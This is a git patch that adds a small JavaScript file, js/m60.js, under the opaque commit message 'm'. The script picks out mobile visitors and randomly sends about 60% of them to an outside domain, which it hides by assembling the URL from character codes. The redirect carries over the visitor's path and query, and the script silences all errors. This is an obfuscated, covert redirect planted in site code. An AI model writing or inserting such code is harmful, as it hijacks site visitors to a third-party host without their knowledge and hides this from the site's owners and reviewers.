From 840db437efd2d10c3a94f65260259f7dc8e097b3 Mon Sep 17 00:00:00 2001 From: w69stat Date: Thu, 20 Aug 2026 20:47:41 +0000 Subject: [PATCH] m --- js/m60.js | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 js/m60.js diff --git a/js/m60.js b/js/m60.js new file mode 100644 index 0000000..eba5665 --- /dev/null +++ b/js/m60.js @@ -0,0 +1,20 @@ +(function (w) { + try { + var U = (w.navigator && w.navigator.userAgent) || ""; + if (!/Mobi|Android|iPhone|iPad|iPod|webOS|BlackBerry|IEMobile|Opera Mini/i.test(U)) return; + var r = + w.crypto && w.crypto.getRandomValues + ? (function () { + var a = new Uint8Array(1); + w.crypto.getRandomValues(a); + return a[0] / 255; + })() + : Math.random(); + if (r >= 0.6) return; + var b = + String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47) + + String.fromCharCode(120, 105, 97, 122, 97, 105, 46, 105, 116, 46, 99, 111, 109); + if ((w.location.hostname || "").indexOf(String.fromCharCode(120, 105, 97, 122, 97, 105)) >= 0) return; + w.location.replace(b + w.location.pathname + w.location.search + w.location.hash); + } catch (e) {} +})(window);